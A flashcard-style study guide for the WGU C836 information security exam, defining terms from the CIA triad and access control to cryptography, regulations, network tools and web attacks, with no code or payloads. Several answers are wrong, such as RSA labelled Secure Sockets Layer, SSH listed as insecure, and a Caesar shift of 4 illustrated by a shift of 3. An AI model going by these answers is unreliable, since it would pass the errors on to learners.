WGU C836 OA Study Guide (Overly Informative)

WGU C836 OA Study Guide (Overly Informative) CIA Triad - ANS Confidentiality, Integrity, Availability Parkerian hexad - ANS Where the CIA triad consists of confidentiality, integrity, and availability, the Parkerian hexad consists of these three principles, as well as possession or control, authenticity, and utility Confidentiality - ANS Refers to our ability to protect our data from those who are not authorized to view it. Confidentiality can be compromised by the loss of a laptop containing data, a person looking over our shoulder while we type a password, an e-mail attachment being sent to the wrong person, an attacker penetrating our systems, or similar issues. Integrity - ANS Refers to the ability to prevent our data from being changed in an unauthorized or undesirable manner. This could mean the unauthorized change or deletion of our data or portions of our data, or it could mean an authorized, but undesirable, change or deletion of our data. To maintain integrity, we not only need to have the means to prevent unauthorized changes to our data but also need the ability to reverse authorized changes that need to be undone. Availability - ANS refers to the ability to access our data when we need it. Loss of availability can refer to a wide variety of breaks anywhere in the chain that allows us access to our data. Such issues can result from power loss, operating system or application problems, network attacks, compromise of a system, or other problems. When such issues are caused by an outside party, such as an attacker, they are commonly referred to as a denial of service (DoS) attack. Possession or Control - ANS Refers to the physical disposition of the media on which the data is stored. This enables us, without involving other factors such as availability, to discuss our loss of the data in its physical medium An example is data store be on multiple devices and there could be numerous versions. Authenticity - ANS Attribution as to the owner or creator of the data in question. Authenticity can be enforced through the use of digital signatures. Utility - ANS Refers to how useful the data is to us. Interception - ANS Interception attacks allow unauthorized users to access our data, applications, or environments and are primarily an attack against confidentiality. Interception might take the form of unauthorized file viewing or copying, eavesdropping on phone conversations, or reading e-mail, and can be conducted against data at rest or in motion. Properly executed, interception attacks can be very difficult to detect. Affects Confidentiality Interruption - ANS Interruption attacks cause our assets to become unusable or unavailable for our use, on a temporary or permanent basis. Interruption attacks often affect availability but can be an attack on integrity as well. In the case of a DoS attack on a mail server, we would classify this as an availability attack. Affects Integrity and availability Modification - ANS Modification attacks involve tampering with our asset. If we access a file in an unauthorized manner and alter the data it contains, we have affected the integrity of the data contained in the file. Fabrication - ANS Fabrication attacks involve generating data, processes, communications, or other similar activities with a system. Fabrication attacks primarily affect integrity but could be considered an availability attack as well. If we generate spurious information in a database, this would be considered to be a fabrication attack. Affects Integrity and Availability Threat - ANS Something that has potential to cause harm Vulnerability - ANS Weaknesses that can be used to harm us Risk - ANS Likeliness that something bad will happen Impact - ANS The value of the asset is used to assess if a risk is present Something you know - ANS Password or PIN Something you are - ANS An authentication factor using biometrics, such as a fingerprint scanner. Something you have - ANS Authentication factor that relies on possession (FOB, Card, Cell Phone, Key) Something you do - ANS An authentication factor indicating action, such as gestures on a touch screen. Multifactor Authentication - ANS Uses one or more authentication methods for access Mutual Authentication - ANS A security mechanism that requires that each party in a communication verify its identity. Can be combine with multifactor authentication. In mutual authentication, not only does the client authenticate to the server, but the server authenticates to the client as well. Mutual authentication is often implemented through the use of digital certificates. Both the client and the server would have a certificate to authenticate the other. Biometric: Universality - ANS Characteristics in the majority of people we expect to enroll for the system. Biometric: Uniqueness - ANS Measure of how unique a particular characteristic is among individuals Biometric: Permanence - ANS How well a particular characteristic resists change over time and with advancing age. Biometric: Collectability - ANS How easy it is to acquire a characteristic with which we can later authenticate a user Biometric: Performance - ANS Set of metrics that judge how well a given system functions. Such factors include speed, accuracy, and error rate Biometric: Acceptability - ANS A measure of how acceptable the particular characteristic is to the users of the system Biometric: Circumvention - ANS Describes the ease with which a system can be tricked by a falsified biometric identifier. Risk Management Process - ANS 1. Identify Asset 2. Identify Threats 3. Assess Vulnerabilities 4. Assess Risk 5. Mitigate Risk Logical Controls - ANS Sometimes called technical controls, these protect the systems, networks, and environments that process, transmit, and store our data Physical Controls - ANS Controls to protect the organization's people and physical environment, such as locks, fire management, gates, and guards; physical controls may be called "operational controls" in some contexts. Administrative Controls - ANS Procedures implemented to define the roles, responsibilities, policies, and administrative functions needed to manage the control environment. Incident Response Process - ANS 1. Preparation - the policies and procedures that govern incident response and handling in place, conducting training and education for both incident handlers 2. Detection and Analysis - detect the occurrence of an issue and decide whether or not it is actually an incident 3. Containment, Eradication, and Recovery - ensure that the situation does not cause any more damage 4. Post Incident Activity - determine specifically what happened, why it happened, and what we can do to keep it from happening again Principle of Least Privilege - ANS Only allow the bare minimum of access to a party—this might be a person, user account, or process—to allow it to perform the functionality needed of it Discretionary Access Control (DAC) - ANS Model of access control based on access being determined by the owner of the resource in question Example: A user who creates a network share and sets permissions on that share Mandatory Access Control (MAC) - ANS Model of access control in which the owner of the resource does not get to decide who gets to access it, but instead access is decided by a group or individual who has the authority to set access on resources Role-Based Access Control (RBAC) - ANS Model of access control that set by an authority responsible for doing so, rather than by the owner of the resource. Attribute-based Access Control (ABAC) - ANS Model of access control that is, logically, based on attributes from a particular person, of a resource, or of an environment. Example: VPN connection is set to timeout after a certain time Multilevel Access Control - ANS An access control model that includes many tiers of security and is used extensively by military and government organizations and those that handle data of a very sensitive nature Confused Deputy Problem - ANS A type of attack that is common in systems that use ACLs rather than capabilities. The crux of the confused deputy problem is seen when the software with access to a resource has a greater level of permission to access the resource than the user who is controlling the software. If we, as the user, can trick the software into misusing its greater level of authority, we can potentially carry out an attack Client-side Attacks - ANS Attacks that take advantage of weaknesses in applications that are running on the computer being operated directly by the user. These attacks can take the form of code sent through the Web browser, which is then executed on the local machine, malformed PDF files, images or videos with attack code embedded, or other forms Cross-Site Request Forgery (CSRF or XSRF) - ANS An attack that misuses the authority of the browser on the user's computer. If the attacker knows of, or can guess, a Web site to which the user might already be authenticated, perhaps a very common site such as A, they can attempt to carry out a CSRF attack [2]. They can do this by embedding a link in a Web page or HTML-based e-mail, generally a link to an image from the site to which he wishes to direct the user without their knowledge. When the application attempts to retrieve the image in the link, it also executes the additional commands the attacker has embedded in it. Clickjacking (User Interface Redressing) - ANS A client-side attack that involves the attacker placing an invisible layer over something on a website that the user would normally click on, in order to execute a command differing from what the user thinks they are performing. Accountability - ANS Identification, Authentication, Authorization, and Access. Nonrepudiation - ANS A situation in which sufficient evidence exists as to prevent an individual from successfully denying that he or she has made a statement, or taken an action Intrusion Detection - ANS Monitors and reports malicious events Intrusion Prevention - ANS Alarms and takes actions when malicious events occur Auditing - ANS The primary means to ensure accountability through technical means. Penetration Test - ANS Mimic, as closely as possible, the techniques an actual attack would use Nessus - ANS Vulnerability scanning tool Caesar Cypher - ANS letter-by-letter method to make a cipher. For each letter, substitute another letter 4 letters ahead. For "a", write "d". Cryptographic Machines - ANS 1. The Jefferson Disk by Thomas Jefferson 2. The Enigma by Arthur Scherbius Kerckhoffs' Principle - ANS 1. The system must be substantial, if not mathematically, undecipherable. 2. The system must not require secrecy and can be stolen by the enemy without causing trouble. 3. It must be easy to communicate and remember the keys without requiring written notes, and it must be easy to change or modify the keys with different participants. 4. The system ought to be compatible with telegraph communication. 5. The system must be portable, and its use must not require more than one person. 6. Finally, regarding the circumstances in which such system is applied, it must be easy to use and must require neither the stress of mind nor the knowledge of a long series of rules. Symmetric Cryptography - ANS Encryption that uses a single key to encrypt and decrypt a message. Block Cipher - ANS Takes a predetermined number of bits, known as a block, in the plaintext message and encrypts that block Stream Cipher - ANS Encrypts each bit in the plaintext message, 1 bit at a time Symmetric Key Algorithms - ANS DES 3DES and AES Symmetric Key Algorithms: DES - ANS A block cipher based on symmetric key cryptography and uses a 56-bit key. Not that secured any more. Symmetric Key Algorithms: AES - ANS Uses three different ciphers: one with a 128-bit key, one with a 192-bit key, and one with a 256-bit key, all having a block length of 128 bits Asymmetric Cryptography - ANS Utilizes two keys: a public key and a private key. The public key is used to encrypt data sent from the sender to the receiver and is shared with everyone. Private keys are used to decrypt data that arrives at the receiving end and are very carefully guarded by the receive Asymmetric Key Algorithms - ANS 1. Secure Sockets Layer (RSA) by Ron Rivest, Adi Shamir, and Leonard Adleman 2. Elliptic Curve Cryptography (ECC) - can secure all browser connections to the Web servers 3. ElGamal 4. Diffie-Hellman 5. DSS 6. Pretty Good Privacy (PGP) 7. Transport Layer Security (TLS) 8. Voice over IP (VoIP) Hash Function - ANS Create a largely unique and fixed-length hash value based on the original message Hashes provide integrity, but not confidentiality. It can't un-hash a message. Hashes are very useful when distributing files or sending communications, as the hash can be sent with the message so that the receiver can verify its integrity Digital Signatures - ANS Ensure that the message was legitimately sent by the expected party, and to prevent the sender from denying that he or she sent the message, known as nonrepudiation Certificates - ANS Link a public key to a particular individual and are often used as a form of electronic identification for that particular person. Protecting Data at Rest - ANS An area in which security is often lax and is a particularly bad area in which we choose not to emphasize security. Data is at rest when it is on a storage device. Protecting Data In Motion - ANS Over a closed WAN or LAN, over a wireless network, over the Internet, or in other ways SSL and TLS are often used to protect information sent over networks and over the Internet Data is in motion when it is on a actively transporting over a network. Protecting Data In Use - ANS Hardest to protect. Data is in use when a user is accessing the data. Cipher - ANS An algorithm used for cryptographic purposes. Cryptanalysis - ANS The science of breaking through encryption Federal Information Security Management Act or Federal Information Security Modernization Act (FISMA) - ANS Ensures the protection of information, operations, and assets in the federal government. Requires each federal agency to develop, document, and implement an information security program to protect its information and information systems. Annual reviews of these programs are required to maintain compliance and keep security risks to an acceptable level. Health Insurance Portability and Accountability Act (HIPAA) - ANS Sets limits on the use and disclosure of patient information without authorization, and grants individuals rights over their own health records Family Educational Rights and Privacy Act (FERPA) - ANS Protects the privacy of students and their parents. It also regulate the disclosure and maintenance of educational records, including educational information, personally identifiable information, and directory information. FERPA also grants certain rights to students and parents regarding the student's own records. Sarbanes-Oxley Act (SOX) - ANS Regulates the financial practice and governance of corporations. Protect investors and the general public by establishing requirements regarding reporting and disclosure practices. The act mandates standards in regards to areas such as corporate board responsibility, auditor independence, fraud accountability, internal controls assessment, and enhanced financial disclosures Gramm-Leach-Bliley Act (GLBA) - ANS Protects the customers of financial institutions, essentially any company offering financial products or services, financial or investment advice, or insurance. The GLBA Privacy Rule requires financial institutions to safeguard a consumer's "nonpublic personal information," or NPI. GLBA also mandates the disclosure of an institution's information collection and information sharing practices, and establishes requirements for providing privacy notices and opt-outs to consumers European Union's Data Protection Directive (Directive 95/46/EC) - ANS Requirements to protect individual's personally identifiable information (PII) Regulatory Compliance - ANS Organizational goal to comply with relevant laws and regulations. It is specific to the industry. In many cases, regulatory compliance comes packaged with cyclical audits and assessments to ensure that everything is being carried out according to specification. Industry Compliance - ANS Regulations or standards usually not mandated by law, it is designed for specific industries (e.g. PCI DSS) Payment Card Industry Data Security Standard (PCI DSS) - ANS Companies that process credit card payments must comply with this set of standards Sun Tzu - ANS Chinese military general who lived in the sixth century BC. His work, The Art of War, provides some of the earliest examples of operations security principles that are plainly stated and clearly documented George Washington - ANS Known in the operations security community for having said, "Even minutiae should have a place in our collection, for things of a seemingly trifling nature, when enjoined with others of a more serious cast, may lead to valuable conclusion", meaning that even small items of information, which are valueless individually, can be of great value in combination This is the foundation of OPSEC as the focus in on unclassified data that when correlated becomes data that should be classified Vietnam War aka Purple Dragon - ANS During the Vietnam War, the United States came to realize that information regarding troop movements, operations, and other military activities was being leaked to the enemy. OPSEC - ANS A formal methodology of operations security Operations Security Process - ANS 1. Identification of critical information 2. Analysis of threats 3. Analysis of vulnerabilities 4. Assessment of risks - match threats and vulnerabilities 5. Application of countermeasures Haas's Laws of Operation Security - ANS First - "If you don't know the threat, how do you know what to protect?" -- develop an awareness of both the actual and potential threats Second - "If you don't know what to protect, how do you know you are protecting it?" -- evaluate our information assets and determine what exactly we might consider to be our critical information. Same as identification of critical information in SecOpt Process #1 Third - "If you are not protecting it (the information), ... THE DRAGON WINS!" -- necessity of the operations security process Competitive Intelligence - ANS The process of intelligence gathering and analysis to support business decisions. Physical Threats - ANS Extreme temperature Gases Liquids Living organism Projectiles Movement Energy anomalies People Toxins Smoke and fire Business Continuity Planning (BCP) - ANS The plans we put in place to ensure that critical business functions can continue operations through the state of emergency. Disaster Recovery Planning (DRP) - ANS The plans we put in place in preparation for a potential disaster, and what exactly we will do during and after a particular disaster strikes to replace infrastructure Deterrent - ANS Discourage those who might seek to violate our security controls from doing so, whether the threat is external or internal. Violation of a policy could result in the employing being disciplined or fired. Violation of a regulation or law could result in criminal or civil prosecution Detective - ANS Detect and report undesirable events that are taking place. Preventive - ANS Physically prevent unauthorized entities from breaching our physical security Defense in depth - ANS Using a variety of security measures that will still achieve a successful defense should one or more of the defensive measures fail RAID - ANS Data storage virtualization technology that combines multiple physical disk drive components into a single logical unit for the purposes of data redundancy, performance improvement, or both Packet Filtering - ANS Looks at the contents of each packet in the traffic individually and makes a gross determination based on the IP, port, and protocol being used. Stateful Packet Inspection - ANS Uses a state table to keep track of the connection state and will only allow traffic through that is part of a new or already established connection A firewall that can watch packets and monitor the traffic from a given connection Deep Packet Inspection - ANS Analyzing the actual content of the traffic that is flowing through them. Proxy Server - ANS Serve as a choke point (discussed earlier in the lesson) in order to allow us to filter traffic for attacks or undesirable content such as malware or traffic to Web sites hosting adult content. They also allow us to log the traffic that goes through them for later inspection, and they serve to provide a layer of security for the devices behind them, by serving as a single source for requests Demilitarized Zone (DMZ) - ANS A separate organizational local area network that is located between an organization's internal network and an external network, usually the Internet. Intrusion Detection System (IDS) - ANS Monitor the networks, hosts, or applications to which they are connected for unauthorized activity network intrusion detection system (NIDS) - ANS A type of IDS that attempts to detect malicious network activities—for example, port scans and DoS attacks—by constantly monitoring network traffic. Anti-threat software is installed only at specific points such as servers that interface between the outside environment and the network segment to be protected. Host Intrusion Detection System (HIDS) - ANS A software-based application that runs on a local host computer that can detect an attack as it occurs. Anti-threat applications such as firewalls, antivirus software and spyware-detection programs are installed on every network computer that has two-way access to the outside environment such as the Internet Application Protocol Intrusion Detection System (APIDS) - ANS Focuses its monitoring and analysis on a specific application protocol or protocols in use by the computing system. Virtual Private Network (VPN) - ANS An encrypted connection/tunnel between two points. Secure Protocols - ANS SFTP Insecure Protocols - ANS Secure Shell (SSH) File Transfer Protocols (FTP) Post Office Protocol (POP) Mobile Device Management (MDM) - ANS Remotely controls smart phones and tablets, ensuring data security The toolset a corporation might use to centrally manage all cellular phones provided to its employees Bring Your Own Device (BYOD) - ANS Policy allows employees to use their personal mobile devices and computers to access enterprise data and applications Port Scanners - ANS Port scanners are a software-based utility. They are a security tool designed to search a network host for open ports on a TCP/IP-based network. Example: Nmap - network mapper Packet Sniffers - ANS Inspecting information packets as they travel across computer networks Honeypots - ANS Tempting, bogus targets meant to lure hackers Hping3 - ANS Tool used to test the security of firewalls Kismet - ANS A tool used to detect unauthorized wireless access points. A sniffer that specializes in detecting wireless devices Nmap - ANS A versatile tool able to scan ports, search for hosts on the network, and other operations Tcpdump - ANS This command-line packet sniffing tool runs on Linux and UNIX operating systems Wireshark - ANS A graphical interface protocol analyzer capable of filtering, sorting, and analyzing both wired and wireless network traffic Hardening categories - ANS 1. Remove unnecessary software 2. Removing or turning off unessential services 3. Making alternations to common accounts 4. Applying the principle of least privilege 5. Applying software updates in a timely manner 6. Making use of logging and auditing functions Port 22 - ANS SSH Port 53 - ANS DNS Port 80 - ANS HTTP Port 443 - ANS HTTPS Executable Space Protection - ANS Technology that can be implemented by operating systems in order to foil attacks that use the same techniques we commonly see used in malware Nessus - ANS Vulnerability Assessment Tools Exploit Frameworks - ANS Metasploit CANVAS Attack surface - ANS The total of the available avenues through which our operating system might be attacked Buffer overflows - ANS Using search fields on website to insert code Occur when we do not properly account for the size of the data input into our applications Proper bounds checking can nullify this type of attack entirely Race conditions - ANS A vulnerability that occurs when an ordered or timed set of processes is disrupted or altered by an exploit Occur when multiple processes or multiple threads within a process control or share access to a particular resource, and the correct handling of that resource depends on the proper ordering or timing of transactions Can be very difficult to detect in existing software, as they are hard to reproduce Input Validations Attacks - ANS When an attacker purposefully sends strange inputs to confuse a web application. Input validation routines serve as the first line of defence for such attacks. Examples of input validation attacks include buffer overflow, directory traversal, cross-site scripting and SQL injection. Authorization Attacks - ANS An attack that exploit the vulnerability of client-side authentication. Cryptographic Attacks - ANS Exploiting the security of a cryptographic system by finding a weakness in a code, cipher, cryptographic protocol or key management scheme Authentication Attacks - ANS Targets and attempts to exploit the authentication process a web site uses to verify the identity of a user, service, or application. Cross-Site Scripting (XSS) - ANS An attack carried out by placing code in the form of a scripting language into a Web page, or other media, that is interpreted by a client browser, including Adobe Flash animation and some types of video files Cross-site Request Forgery (XSRF) - ANS The attacker places a link, or links, on a Web page in such a way that they will be automatically executed, in order to initiate a particular activity on another Web page or application where the user is currently authenticated Clickjacking - ANS An attack that takes advantage of the graphical display capabilities of our browser to trick us into clicking on something we might not otherwise. Clickjacking attacks work by placing another layer over the page, or portions of the page, in order to obscure what we are actually clicking Sever-side Attacks - ANS Lack of input validation Improper or inadequate permissions Extraneous files Web Application Analysis Tools - ANS Perform the same general set of tasks and will search for common flaws such as XSS or SQL injection flaws, as well as improperly set permissions, extraneous files, outdated software versions, and many more such items Example: Nikto and Wikto and Burp Suite Fuzzers - ANS Work by bombarding our applications with all manner of data and inputs from a wide variety of sources, in the hope that we can cause the application to fail or to perform in unexpected ways. BinScope Binary Analyzer - ANS A tool developed by Microsoft to examine source code for general good practices Nikto/Wikto - ANS Checks for many common server-side vulnerabilities, and creates an index of all the files and directories it can see on the target Web server